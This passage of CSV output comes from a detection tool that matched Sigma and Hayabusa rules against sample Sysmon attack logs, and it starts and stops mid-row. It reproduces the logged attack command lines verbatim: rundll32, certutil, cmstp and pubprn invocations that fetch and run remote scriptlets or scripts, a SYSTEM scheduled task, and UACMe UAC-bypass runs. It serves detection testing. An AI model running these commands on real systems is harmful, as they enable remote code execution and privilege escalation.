",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
"";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in 
CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.252 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" 
/C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmstp.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm qc -q : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm qc -q ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: calc : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 
+09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 
+09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 
script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 34 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 34",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 19:14:02.589 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 33 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 324 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\fodhelper.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 32 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064421EA0 : Path: 
C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 